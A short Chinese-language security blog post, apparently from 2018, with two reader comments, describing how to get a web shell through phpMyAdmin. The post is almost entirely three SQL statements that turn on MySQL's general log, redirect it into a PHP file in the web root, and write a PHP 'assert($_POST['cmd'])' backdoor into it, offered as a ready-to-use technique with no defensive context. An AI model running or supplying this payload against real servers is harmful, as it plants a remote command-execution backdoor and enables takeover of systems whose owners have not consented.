三个sql语句拿下phpmyadmin的shell

2018-06-17
安全
2 条评论
4.73K次阅读

三个sql语句拿下phpmyadmin的shell

首先要知道路径

一句一句的执行

---------------------------------------------------------
set global general_log='on';
---------------------------------------------------------
SET global general_log_file='D:/webshell/www/cmd.php';
---------------------------------------------------------
SELECT '<?php assert($_POST["cmd"]);?>';
---------------------------------------------------------

转载请注明来自WebShell'S Blog，本文地址：https://www.webshell.cc/6565.html

phpmyadmin Shell sql

已有 2 条评论

QAQ

2019/12/02 14:34

能说一下这个属于哪个CVE的嘛?我想再找找这方面的帖子看看原理你这个讲的太简单让我看的有点懵不知道怎么复现

回复
xishanly

2019/11/14 06:25

如何上传cmd.php是个世纪难题啊

回复

添加新评论

上一篇: phpMyAdmin 4.7.x CSRF 漏洞利用
下一篇: kali2018.2源